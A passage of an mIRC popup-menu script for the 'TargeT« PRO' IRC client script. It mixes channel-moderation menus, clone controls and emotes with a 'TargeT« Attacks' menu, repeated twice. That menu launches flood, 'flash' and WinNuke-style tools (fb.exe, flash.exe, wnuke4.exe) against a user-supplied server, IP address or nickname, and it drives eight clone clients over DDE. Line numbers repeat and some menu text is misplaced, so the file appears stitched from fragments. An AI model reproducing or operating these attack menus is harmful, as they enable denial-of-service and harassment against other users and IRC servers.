n12=...&Add a Channel to Protect List:/set -q %chklone %chklone $$?="Set Channel to add:"
n13=...&Remove a Channel from Protect List:/set -q %rchkln $$?="Enter the Channel to Remove" | /if (%rchkln !isin %chklone) { Echo 4 Syntax Error12 %rchkln 7isn't in 3Protect List } | /else { /set -q %chklone $remove(%chklone, %rchkln) }
n14=...&See the Protect List:/if (%chklone != $null) { Echo 12 Channels in Protect List are :7 %chklone } | /if (%chklone == $null) { Echo 12 There aren't Channels on Protect List }
n15=...-
n16=...Max Op Clones:/set %cops $$?="Set the Maximun Clones permitied to an Op:"
n17=...Max NonOp Clones:/set %cnon $$?="Set the Maximun Clones permitied to NonOps:"
n18=...Kick on Excess?:/set %cckk $$?="Kick Clones on Excess?(y \ n)" | /if ((%cckk == y) || (%cckk == Yes)) { set -q %ckik on } | /else { set -q %ckik off }
n19=...Ban on Excess?:/set %ccban $$?="Ban Clones on Excess?(y \ n)" | /if ((%ccban == y) || (%ccban == Yes)) { set -q %cban on } | /else { set -q %cban off }
n20=..-
n21=..&List All Clones (F5):/f5
n22=..&Kick All Clones (F6):/f6
n23=..&Kick , Ban All Clones (F7):/f7
n24=..-
n25=..Kick IPs of the Clones (with optional ban) (F8):/f8
n26=..-
n27=..Kill Clones on Channel (F9):/f9
n28=..Kill Clones on Servers (F10):/f10
n29=.-
n30=.TargeT« &Channel Modes
n31=..&Regular:/mode # +snt-ilkm
n32=..-
n33=..&Private
n34=...&On:/mode # +p
n35=...O&ff:/mode # -p
n36=..&Secret
n37=...&On:/mode # +s
n38=...O&ff:/mode # -s
n39=..&Channel Key
n40=...&On:/mode # +k $$?="Write a Channel Key"
n41=...O&ff:/mode # -k
n42=..&Channel Limit
n43=...&On:/mode # +l $$?="Write the Limit Number"
n44=...O&ff:/mode # -l 0
n45=..&Invite Only
n46=...&On:/mode # +i
n47=...O&ff:/mode # -i
n48=..&Moderated
n49=...&On:/mode # +m
n50=...O&ff:/mode # -m
n51=.&TargeT« Channel Topics
n52=..&Ropes:/topic # .╖┤»`╖.╕╕.╖┤»`╖.╕.╖┤»`╖.╕╕.╖┤»`╖.╕ WeLcOmE to # .╖┤»`╖.╕╕.╖┤»`╖.╕.╖┤»`╖.╕╕.╖┤»`╖.╕
n59=...Cool Style #2:/topic $chan ¿¿░║⌐o┐,,┐o⌐║░¿¿░║⌐ $$?="Enter a Topic" ⌐║░¿¿░║⌐o┐,,┐o⌐║░
n60=...Cool Style #3:/topic $chan .,-*-,._.,-*'^'~*-,._.,-*~> $$?="Enter a Topic" <~*-,._.,-*~'^'~*-,._.,-*-,.
n61=...Cool Style #4:/topic $chan "%+%+%+%+%+%+%+%+{+{ $$?="Enter a Topic" }+}+%+%+%+%+%+%+%+% "
n62=...Cool Style #5:/topic # (»`╖.,╕╕.╖┤»`╖.╕╕.-> $$?="Enter a Topic" <-.╕╕.╖┤»`╖.╕╕.╖┤»)
n63=.-
n64=.&Only OPs...
n65=..OPs &Notices:/on $$?="Set Ops Notice:"
n66=..OPs &Messages:/om $$?="Set Ops Message:"
n67=TargeT« Auto&Kicks
n68=.&Add nick to Never Kick List:/set -q %nokick %nokick $chr(187) $+ $$?="Set a nick to never kick:" $+ $chr(187)
n69=.&Remove nick from Never Kick List:/set -q %rkklist $$?="Enter Nick to Remove" | /set -q %rkklist $chr(187) $+ %rkklist $+ $chr(187) | /set -q %nokick $remove(%nokick, %rkklist)
n70=.&See the Never Kick List:/if (%nokick != $null) { Echo 12 Nicks on Never Kick List are :7 %nokick } | /if {%nokick == $null) { Echo 12 There aren't nick on Never Kick List }
n129=...&Add to Swear List:/set -q %Pswear %Pswear $chr(176) $+ $$?="Set an word to add at Swear List:" $+ $chr(176)
n130=...&Remove from Swear List:/set -q %rswear $$?="Enter an Word to Remove" | /if (%rswear !isin %Pswear) { Echo 4 Syntax Error12 %rswear 7isn't in 3Swear List } | /else { /set -q %rswear $chr(176) $+ %rswear $+ $chr(176) | /set -q %Pswear $remove(%Pswear, %rswear) }
n131=...&See the Swear List:/if (%Pswear != $null) { Echo 12 Words on Swear List are :7 %Pswear } | /if {%Pswear == $null) { Echo 12 There aren't word on Swear List }
n132=..-
n133=..&Fake SwearKick
n134=...&On:{
n135= /if (%fake == Enabled) { Echo -a 4TargeT«12 Fake SwearKick 7is ENABLED Yet | halt }
n143=...&Add to Fake Swear List:/set -q %Fswear %Fswear $chr(176) $+ $$?="Set an word to add at Fake Swear List:" $+ $chr(176)
n144=...&Remove from Fake Swear List:/set -q %rfswear $$?="Enter an Word to Remove" | /if (%rfswear !isin %Fswear) { Echo 4 Syntax Error12 %rfswear 7isn't in3 Fake Swear List } | /else { /set -q %rfswear $chr(176) $+ %rswear $+ $chr(176) | /set -q %Fswear $remove(%Fswear, %rfswear) }
n145=...&See the Fake Swear List:/if (%Fswear != $null) { Echo 12 Words on Fake Swear List are :7 %fswear } | /if {%Fswear == $null) { Echo 12 There aren't word on Fake Swear List }
n146=..-
n147=..Swear &Nick
n148=...&On:{
n149= /if (%swearnick == Enabled) { Echo -a 4TargeT«12Nick SwearKick 7is ENABLED Yet | halt }
n150= /if (%swearnick == Disabled) { /ame 4TargeT« 12Nick SwearKick was 7ENABLED by $me | /set -q %swearnick Enabled }
n151=}
n152=...O&ff:{
n153= /if (%swearnick == Disabled) { Echo -a 4TargeT«12Nick SwearKick 7is DISABLED Yet | halt }
n154= /if (%swearnick == Enabled) { /ame 4TargeT« 12Fake SwearKick was 7DISABLED by $me | /set -q %swearnick Disabled }
n155=}
n156=...-
n157=...&Add to Swear Nick List:/set -q %nokick %nokick $chr(187) $+ $$?="Enter a nick to add:" $+ $chr(187)
n158=...&Remove from Swear Nick List:.&Remove nick from Never Kick List:/set -q %rsnicks $$?="Enter Nick to Remove" | /set -q %rsnicks $chr(187) $+ %rsnicks $+ $chr(187) | /set -q %snicks $remove(%snicks, %rsnicks)
n159=...&See the Swear List:/if (%snicks != $null) { Echo 12 Nicks on Nick Swear List are :7 %snicks } | /if {%snicks == $null) { Echo 12 There aren't nick on Nick Swear List }
n160=.-
n161=.Mass &Kick Protection
n162=..&On:{
n163= /if (%masskick == Enabled) { Echo -a 4TargeT«12 Mass Kick Protection 7is ENABLED Yet | halt }
n187=..&Add a Channel to Protect List:/set -q %chklone %chklone $$?="Set Channel to add:"
n188=..&Remove a Channel from Protect List:/set -q %rchkln $$?="Enter the Channel to Remove" | /if (%rchkln !isin %chklone) { Echo 4 Syntax Error12 %rchkln 7isn't in 3Protect List } | /else { /set -q %chklone $remove(%chklone, %rchkln) }
n189=..&See the Protect List:/if (%chklone != $null) { Echo 12 Channels in Protect List are :7 %chklone } | /if (%chklone == $null) { Echo 12 There aren't Channels on Protect List }
n190=..-
n191=..Max &Op Clones:/set %cops $$?="Set the Maximun Clones permitied to an Op:"
n192=..Max &NonOp Clones:/set %cnon $$?="Set the Maximun Clones permitied to NonOps:"
n193=..&Kick on Excess?:/set %cckk $$?="Kick Clones on Excess?(y \ n)" | /if ((%cckk == y) || (%cckk == Yes)) { set -q %ckik on } | /else { set -q %ckik off }
n194=..&Ban on Excess?:/set %ccban $$?="Ban Clones on Excess?(y \ n)" | /if ((%ccban == y) || (%ccban == Yes)) { set -q %cban on } | /else { set -q %cban off }
n195=-
n196=TargeT« &Protections...
n197=.&Against FlooD
n198=..&TargeT Protection:/dlevel 2 | /enable #TargeT | /disable #Power | /echo 4 The Best of All Scripts Protection !!! | /set -q %proctcp 10 TargeT ½½ The best
n199=..&TargeT Protection Setup:/set -q %ctcplimit $$?="How many Ctcps is Flood?" | /if (%ctcplimit !isnum) { echo 12 Syntax Error:7 %ctcplimit is not a valid number ,4setting Ctcp limit to default ╗ 3 | /set -q %ctcplimit 3 } | /set -q %echolimit $$?="How Many Words in echo is Flood?" | /if (%echolimit !isnum) { echo 12 Syntax Error:7 %echolimit is not a valid number ,4setting Echo limit to default ╗ 150 | /set -q %echolimit 150 }
n200=..-
n201=..&Power Protecion:/dlevel 2 | /enable #Power | /disable #TargeT | /echo 2 The name say everything: More Power!!! | /set -q %proctcp Power
n202=.Against &Kill
n203=..&On:/enable #AntiKill | /echo 12 Now you're protected against kill!! | /set -q %antkill Enabled
n204=..O&ff:/disable #AntiKill | /echo 12 Do you want to receive a Kill??7 Now you aren't protected, be careful!! | /set -q %antkill Disabled
n205=&TargeT« Attacks
n206=.&FB
n207=..&Text Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 1 $$?="What Server?:"
n208=..&Finger Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 2 $$?="What Server?:"
n209=..&Ping Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 3 $$?="What Server?:"
n210=..&SED Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 4 $$?="What Server?:"
n211=..&BotKiller Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 5 $$?="What Server?:"
n212=..&Echo Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" Bello 6 $$?="What Server?:"
n213=..&Blitz Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 7 $$?="What Server?:"
n214=..&Version Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 8 $$?="What Server?:"
n215=.&Flash
n216=..&Basic:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 1
n217=..&ZModem:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 2
n218=..&Killer:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 3
n226=..Nuke Attack IP:/run c:\target\bin\wnuke4.exe -n $$?="Set the Users IRC Server" $$?="Set the Users IP Address" 0 1024-3500 $$?="Set the Port (Ex: 6667)"
n227=..Nuke Attack Nick
n228=...Port?:/set %nukeport $$?="Set the Port" | /nuke $$?="Set the TargeT:"
n229=...--
n230=...4400:/set %nukeport 4400 | /nuke $$?="Set the TargeT:"
n231=...6660:/set %nukeport 6660 | /nuke $$?="Set the TargeT:"
n232=...6661:/set %nukeport 6661 | /nuke $$?="Set the TargeT:"
n233=...6662:/set %nukeport 6662 | /nuke $$?="Set the TargeT:"
n234=...6663:/set %nukeport 6663 | /nuke $$?="Set the TargeT:"
n235=...6664:/set %nukeport 6664 | /nuke $$?="Set the TargeT:"
n236=...6665:/set %nukeport 6665 | /nuke $$?="Set the TargeT:"
n237=...6666:/set %nukeport 6666 | /nuke $$?="Set the TargeT:"
n238=...6667:/set %nukeport 6667 | /nuke $$?="Set the TargeT:"
n239=...6668:/set %nukeport 6668 | /nuke $$?="Set the TargeT:"
n240=...6669:/set %nukeport 6669 | /nuke $$?="Set the TargeT:"
n241=...6670:/set %nukeport 6670 | /nuke $$?="Set the TargeT:"
n291=..Clone Nick &1:/dde TgT1 command "" /nick $$?="Set the new nick to ╗ Clone1 ½" | /timer87 1 2 /set -q %klname1 $!
n292=..Clone Nick &2:/dde TgT2 command "" /nick $$?="Set the new nick to ╗ Clone2 ½" | /timer81 1 2 /set -q %klname2 $!
n293=..Clone Nick &3:/dde TgT3 command "" /nick $$?="Set the new nick to ╗ Clone3 ½" | /timer82 1 2 /set -q %klname3 $!
n294=..Clone Nick &4:/dde TgT4 command "" /nick $$?="Set the new nick to ╗ Clone4 ½" | /timer83 1 2 /set -q %klname4 $!
n295=..Clone Nick &5:/dde TgT5 command "" /nick $$?="Set the new nick to ╗ Clone5 ½" | /timer84 1 2 /set -q %klname5 $!
n296=..Clone Nick &6:/dde TgT6 command "" /nick $$?="Set the new nick to ╗ Clone6 ½" | /timer85 1 2 /set -q %klname6 $!
n297=..Clone Nick &7:/dde TgT7 command "" /nick $$?="Set the new nick to ╗ Clone7 ½" | /timer86 1 2 /set -q %klname7 $!
n298=..Clone Nick &8:/dde TgT8 command "" /nick $$?="Set the new nick to ╗ Clone8 ½" | /timer87 1 2 /set -q %klname8 $!
n299=..-
n300=..&Radom nicks:{
n301= dde TgT1 command "" /cgnick
n302= dde TgT2 command "" /cgnick
n303= dde TgT3 command "" /cgnick
n304= dde TgT4 command "" /cgnick
n305= dde TgT5 command "" /cgnick
n306= dde TgT6 command "" /cgnick
n307= dde TgT7 command "" /cgnick
n308= dde TgT8 command "" /cgnick
n309=}
n310=..-
n311=..&Choose Radom nicks:/klonicks $$?="Choose Radom nick 1" $$?="Choose Radom nick 2" $$?="Choose Radom nick 3" $$?="Choose Radom nick 4" $$?="Choose Radom nick 5" $$?="Choose Radom nick 6" $$?="Choose Radom nick 7" $$?="Choose Radom nick 8" $$?="Choose Radom nick 9" $$?="Choose Radom nick 10" $$?="Choose Radom nick 11" $$?="Choose Radom nick 12" $$?="Choose Radom nick 13" $$?="Choose Radom nick 14" $$?="Choose Radom nick 15"
n312=..-
n313=..&Auto nick Change
n314=...ON:/dde TgT1 command "" /set -q %cgnick on | /dde TgT2 command "" /set -q %cgnick on | /dde TgT3 command "" /set -q %cgnick on | /dde TgT4 command "" /set -q %cgnick on | /dde TgT5 command "" /set -q %cgnick on | /dde TgT6 command "" /set -q %cgnick on | /dde TgT7 command "" /set -q %cgnick on | /dde TgT8 command "" /set -q %cgnick on
n315=...OFF:/dde TgT1 command "" /set -q %cgnick off | /dde TgT2 command "" /set -q %cgnick off | /dde TgT3 command "" /set -q %cgnick off | /dde TgT4 command "" /set -q %cgnick off | /dde TgT5 command "" /set -q %cgnick off | /dde TgT6 command "" /set -q %cgnick off | /dde TgT7 command "" /set -q %cgnick off | /dde TgT8 command "" /set -q %cgnick off
n35=...&Super-sonic weapon:/me 12looks deeply at $$1 's eyes, $me takes a strange object that was into the Jacket... It was a super-sonic weapon!! | /me 7hit a hiper-triper-super ray at $$1 's head!!! | /kick # $$1 HaHaHa!! You don't have a quad-hiper-super protection!! %specialkik
n36=...-
n37=...&Punches & Punches:/me 12picks on $$1 's neck, hits a left's direct on $$1 's face, gives an right's upper in $$1 's stomach | /me 7looks $$1 felling down and gives him a kick... | /kick # $$1 You need a trainer!!! %specialkik
n38=...-
n39=...&No clones:/me 12says that clones are prohibits, so $$1 starts to tremble, $me says that $$1 have 5 seconds to take over it clones!!! | /me 7starts to count: 1,... | /kick # $$1 2,3,4,5 time over :) %specialkik
n40=...-
n41=...&Floods:/me 12see $$1 writing once a time and writing again... | /me 7and writing more one, but $me knows that's the last time... | /kick # $$1 don't flood flood flood!! %specialkik
n42=...-
n43=...&No CAPS:/me 12see $$1 writing with big letters... and say: it's prohibit cause it appear like a swear... | /kick $chan $$1 No CAPs, It causes LAG %specialkik
n44=.-
n45=.&Ban
n46=..&Normal Ban:/ban $$1 2
n47=..-
n48=..&Nick-User-Host-Domain:/ban # $$1
n49=..-
n50=..&User-Host-Domain:/ban # $$1 1
n51=..-
n52=..&Host-Domain:/ban # $$1 2
n53=..-
n54=..&User-Domain:/ban # $$1 3
n55=..-
n56=..&Domain:/ban # $$1 4
n57=..-
n58=..&Kick-Ban:/ban $$1 2 | /kick # $$1
n59=.-
n60=.&Channel Modes
n61=..&Prevent Topic Changes From Non-Ops (+t)
n62=...&On:/mode # +t
n63=...&Off:/mode # -t
n64=..-
n65=..&Key Protection (+k)
n66=...&On:/mode # +K $$?="Choose the password:"
n67=...&Off:/mode # -k
n68=..-
n69=..&Secret (+s)
n70=...&On:/mode # +s
n71=...&Off:/mode # -s
n72=..-
n73=..&No External Msg's (+n)
n74=...&On:/mode # +n
n75=...&Off:/mode # -n
n76=..-
n77=..&Invite Only (+i)
n78=...&On:/mode # +i
n79=...&Off:/mode # -i
n80=..-
n81=..&Moderated (+m)
n82=...&On:/mode # +m
n83=...&Off:/mode # -m
n84=..-
n85=..&Limit Users (+l)
n86=...&On:/mode # +l $$?="Set Max users's number:"
n87=...&Off:/mode # -l
n88=.-
n89=.&TargeT« Channel Topics
n90=..&Ropes:/topic # .╖┤»`╖.╕╕.╖┤»`╖.╕.╖┤»`╖.╕╕.╖┤»`╖.╕ WeLcOmE to # .╖┤»`╖.╕╕.╖┤»`╖.╕.╖┤»`╖.╕╕.╖┤»`╖.╕
n189=..&Rose:/me gives a beatiful rose to $$1 @}-->---
n190=..&Kiss:/me take $$1 in his arms the kiss she slowly
n191=..&Love:/me look at $$1 's eyes and say : $$1, I LOVE YOU !!!!
n192=..&Cry:/me cry , cry because $$1 don't love he
n193=.-
n194=.&Portuguese
n195=..&Rosa:/me pega uma linda rosa , tira todos os seus espinhos e a oferece com carinho α $$1 13@9}3--9>3---
n196=..&Beijo de amigo:/me da um beijo super carinhoso na bochecha de $$1
n197=..&Super Beijo:/me pega $$1 em seus braτos e ,perdido de paixπo, a beija apaixonadamente º:¼╫
n198=..&Te Amo:/me olha profundamente nos olhos de $$1 e diz : EU TE AMO !!!!
n199=..&Choro:/me chora , chora porque $$1 nπo o ama ╢:~(
n200=..&Abraτo:/me da um forte abraτo em $$1 ╢;¼D
n201=..&Cerveja:/me vai na cozinha, abre o frezzer e procura cuidadosamente um objeto vital para a vida de um homen...encontra o que estava procurando, uma cerveja, quando estava abrindo a latinha, vΩ $$1, fica com pena e resolve oferece-la a $$1. Assim que entrega a cerveja ele grita VIRAAAA!!! :)
n202=..&Oi:/query $$1 Oi $nick, tudo joia???
[bPopup]
n0=== TargeT« PRO ==
n1=&TargeT« General KEY
n2=.&On:/remote on | /ame 4TargeT« 12Full Script 7was ENABLED by $me
n3=.O&ff:/remote off | /ame 4TargeT« 12Full Script 7was DISABLED by $me
n4=TargeT« &Demo:/run c:\target\targdemo.bat
n5=-
n6=&Eggdrop« Commands
n7=.&Set Hello:/msg $$?="Set the nick of Eggdrop" Hello
n8=.-
n9=.&Set Password:/msg $$?="Set the nick of Eggdrop" Pass $?="Enter your Password:"
n10=.-
n11=.&Set Info:/msg $$?="Set the nick of Eggdrop" Info $$?="Enter an INFO to be used by BOT:"
n12=.-
n13=.&Get Ops:/msg $$?="Set the nick of Eggdrop" Op $$?="Enter Your Password:"
n14=.-
n15=.&Ident:/msg $$?="Set the nick of Eggdrop" Ident $$?="Enter Your Password:"
n16=.-
n17=.&Get Help:/msg $$?="Set the nick of Eggdrop" Help
n18=-
n19=TargeT« Auto&Kicks
n20=.&Add nick to Never Kick List:/set -q %nokick %nokick $chr(187) $+ $$?="Set a nick to never kick:" $+ $chr(187)
n21=.&Remove nick from Never Kick List:/set -q %rkklist $$?="Enter Nick to Remove" | /set -q %rkklist $chr(187) $+ %rkklist $+ $chr(187) | /set -q %nokick $remove(%nokick, %rkklist)
n22=.&See the Never Kick List:/if (%nokick != $null) { Echo 12 Nicks on Never Kick List are :7 %nokick } | /if {%nokick == $null) { Echo 12 There aren't nick on Never Kick List }
n81=...&Add to Swear List:/set -q %Pswear %Pswear $chr(176) $+ $$?="Set an word to add at Swear List:" $+ $chr(176)
n82=...&Remove from Swear List:/set -q %rswear $$?="Enter an Word to Remove" | /if (%rswear !isin %Pswear) { Echo 4 Syntax Error12 %rswear 7isn't in 3Swear List } | /else { /set -q %rswear $chr(176) $+ %rswear $+ $chr(176) | /set -q %Pswear $remove(%Pswear, %rswear) }
n83=...&See the Swear List:/if (%Pswear != $null) { Echo 12 Words on Swear List are :7 %Pswear } | /if {%Pswear == $null) { Echo 12 There aren't word on Swear List }
n84=..-
n85=..&Fake SwearKick
n86=...&On:{
n87= /if (%fake == Enabled) { Echo -a 4TargeT«12 Fake SwearKick 7is ENABLED Yet | halt }
n95=...&Add to Fake Swear List:/set -q %Fswear %Fswear $chr(176) $+ $$?="Set an word to add at Fake Swear List:" $+ $chr(176)
n96=...&Remove from Fake Swear List:/set -q %rfswear $$?="Enter an Word to Remove" | /if (%rfswear !isin %Fswear) { Echo 4 Syntax Error12 %rfswear 7isn't in3 Fake Swear List } | /else { /set -q %rfswear $chr(176) $+ %rswear $+ $chr(176) | /set -q %Fswear $remove(%Fswear, %rfswear) }
n97=...&See the Fake Swear List:/if (%Fswear != $null) { Echo 12 Words on Fake Swear List are :7 %fswear } | /if {%Fswear == $null) { Echo 12 There aren't word on Fake Swear List }
n98=..-
n99=..Swear &Nick
n100=...&On:{
n101= /if (%swearnick == Enabled) { Echo -a 4TargeT«12Nick SwearKick 7is ENABLED Yet | halt }
n102= /if (%swearnick == Disabled) { /ame 4TargeT« 12Nick SwearKick was 7ENABLED by $me | /set -q %swearnick Enabled }
n103=}
n104=...O&ff:{
n105= /if (%swearnick == Disabled) { Echo -a 4TargeT«12Nick SwearKick 7is DISABLED Yet | halt }
n106= /if (%swearnick == Enabled) { /ame 4TargeT« 12Fake SwearKick was 7DISABLED by $me | /set -q %swearnick Disabled }
n107=}
n108=...-
n109=...&Add to Swear Nick List:/set -q %nokick %nokick $chr(187) $+ $$?="Enter a nick to add:" $+ $chr(187)
n110=...&Remove from Swear Nick List:.&Remove nick from Never Kick List:/set -q %rsnicks $$?="Enter Nick to Remove" | /set -q %rsnicks $chr(187) $+ %rsnicks $+ $chr(187) | /set -q %snicks $remove(%snicks, %rsnicks)
n111=...&See the Swear List:/if (%snicks != $null) { Echo 12 Nicks on Nick Swear List are :7 %snicks } | /if {%snicks == $null) { Echo 12 There aren't nick on Nick Swear List }
n112=.-
n113=.Mass &Kick Protection
n114=..&On:{
n115= /if (%masskick == Enabled) { Echo -a 4TargeT«12 Mass Kick Protection 7is ENABLED Yet | halt }
n139=..&Add a Channel to Protect List:/set -q %chklone %chklone $$?="Set Channel to add:"
n140=..&Remove a Channel from Protect List:/set -q %rchkln $$?="Enter the Channel to Remove" | /if (%rchkln !isin %chklone) { Echo 4 Syntax Error12 %rchkln 7isn't in 3Protect List } | /else { /set -q %chklone $remove(%chklone, %rchkln) }
n141=..&See the Protect List:/if (%chklone != $null) { Echo 12 Channels in Protect List are :7 %chklone } | /if (%chklone == $null) { Echo 12 There aren't Channels on Protect List }
n142=..-
n143=..Max &Op Clones:/set %cops $$?="Set the Maximun Clones permitied to an Op:"
n144=..Max &NonOp Clones:/set %cnon $$?="Set the Maximun Clones permitied to NonOps:"
n145=..&Kick on Excess?:/set %cckk $$?="Kick Clones on Excess?(y \ n)" | /if ((%cckk == y) || (%cckk == Yes)) { set -q %ckik on } | /else { set -q %ckik off }
n146=..&Ban on Excess?:/set %ccban $$?="Ban Clones on Excess?(y \ n)" | /if ((%ccban == y) || (%ccban == Yes)) { set -q %cban on } | /else { set -q %cban off }
n147=-
n148=TargeT« &Protections...
n149=.&Against FlooD
n150=..&TargeT Protection:/dlevel 2 | /enable #TargeT | /disable #Power | /echo 4 The Best of All Scripts Protection !!! | /set -q %proctcp 10 TargeT ½½ The best
n151=..&TargeT Protection Setup:/set -q %ctcplimit $$?="How many Ctcps is Flood?" | /if (%ctcplimit !isnum) { echo 12 Syntax Error:7 %ctcplimit is not a valid number ,4setting Ctcp limit to default ╗ 3 | /set -q %ctcplimit 3 } | /set -q %echolimit $$?="How Many Words in echo is Flood?" | /if (%echolimit !isnum) { echo 12 Syntax Error:7 %echolimit is not a valid number ,4setting Echo limit to default ╗ 150 | /set -q %echolimit 150 }
n152=..-
n153=..&Power Protecion:/dlevel 2 | /enable #Power | /disable #TargeT | /echo 2 The name say everything: More Power!!! | /set -q %proctcp Power
n154=.Against &Kill
n155=..&On:/enable #AntiKill | /echo 12 Now you're protected against kill!! | /set -q %antkill Enabled
n156=..O&ff:/disable #AntiKill | /echo 12 Do you want to receive a Kill??7 Now you aren't protected, be careful!! | /set -q %antkill Disabled
n157=.&NetSplit Sensor
n158=..&On:/set -q %netsplit on | /ame 4TargeT« 12NetSplit Sensor 7was ENABLED by $me
n159=..O&ff:/set -q %netsplit off | /ame 4TargeT« 12NetSplit Sensor 7was DISABLED by $me
n160=&TargeT« Attacks
n161=.&FB
n162=..&Text Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 1 $$?="What Server?:"
n163=..&Finger Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 2 $$?="What Server?:"
n164=..&Ping Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 3 $$?="What Server?:"
n165=..&SED Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 4 $$?="What Server?:"
n166=..&BotKiller Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 5 $$?="What Server?:"
n167=..&Echo Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" Bello 6 $$?="What Server?:"
n168=..&Blitz Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 7 $$?="What Server?:"
n169=..&Version Flood:/run c:\target\bin\fb.exe $$?="How Many Clones?:" $$?="Seconds To Sleep:" # 8 $$?="What Server?:"
n170=.&Flash
n171=..&Basic:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 1
n172=..&ZModem:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 2
n173=..&Killer:/run c:\target\bin\flash.exe $$?="Who you want flash ( user@host ):" 3
n181=..Nuke Attack IP:/run c:\target\bin\wnuke4.exe -n $$?="Set the Users IRC Server" $$?="Set the Users IP Address" 0 1024-3500 $$?="Set the Port (Ex: 6667)"
n182=..Nuke Attack Nick
n183=...Port?:/set %nukeport $$?="Set the Port" | /nuke $$?="Set the TargeT:"
n184=...--
n185=...4400:/set %nukeport 4400 | /nuke $$?="Set the TargeT:"
n186=...6660:/set %nukeport 6660 | /nuke $$?="Set the TargeT:"
n187=...6661:/set %nukeport 6661 | /nuke $$?="Set the TargeT:"
n188=...6662:/set %nukeport 6662 | /nuke $$?="Set the TargeT:"
n189=...6663:/set %nukeport 6663 | /nuke $$?="Set the TargeT:"
n190=...6664:/set %nukeport 6664 | /nuke $$?="Set the TargeT:"
n191=...6665:/set %nukeport 6665 | /nuke $$?="Set the TargeT:"
n192=...6666:/set %nukeport 6666 | /nuke $$?="Set the TargeT:"
n193=...6667:/set %nukeport 6667 | /nuke $$?="Set the TargeT:"
n194=...6668:/set %nukeport 6668 | /nuke $$?="Set the TargeT:"
n195=...6669:/set %nukeport 6669 | /nuke $$?="Set the TargeT:"
n196=...6670:/set %nukeport 6670 | /nuke $$?="Set the TargeT:"
n248=..&Choose Radom nicks:/klonicks $$?="Choose Radom nick 1" $$?="Choose Radom nick 2" $$?="Choose Radom nick 3" $$?="Choose Radom nick 4" $$?="Choose Radom nick 5" $$?="Choose Radom nick 6" $$?="Choose Radom nick 7" $$?="Choose Radom nick 8" $$?="Choose Radom nick 9" $$?="Choose Radom nick 10" $$?="Choose Radom nick 11" $$?="Choose Radom nick 12" $$?="Choose Radom nick 13" $$?="Choose Radom nick 14" $$?="Choose Radom nick 15"
n249=..-
n250=..&Auto nick Change
n251=...ON:/dde TgT1 command "" /set -q %cgnick on | /dde TgT2 command "" /set -q %cgnick on | /dde TgT3 command "" /set -q %cgnick on | /dde TgT4 command "" /set -q %cgnick on | /dde TgT5 command "" /set -q %cgnick on | /dde TgT6 command "" /set -q %cgnick on | /dde TgT7 command "" /set -q %cgnick on | /dde TgT8 command "" /set -q %cgnick on
n252=...OFF:/dde TgT1 command "" /set -q %cgnick off | /dde TgT2 command "" /set -q %cgnick off | /dde TgT3 command "" /set -q %cgnick off | /dde TgT4 command "" /set -q %cgnick off | /dde TgT5 command "" /set -q %cgnick off | /dde TgT6 command "" /set -q %cgnick off | /dde TgT7 command "" /set -q %cgnick off | /dde TgT8 command "" /set -q %cgnick off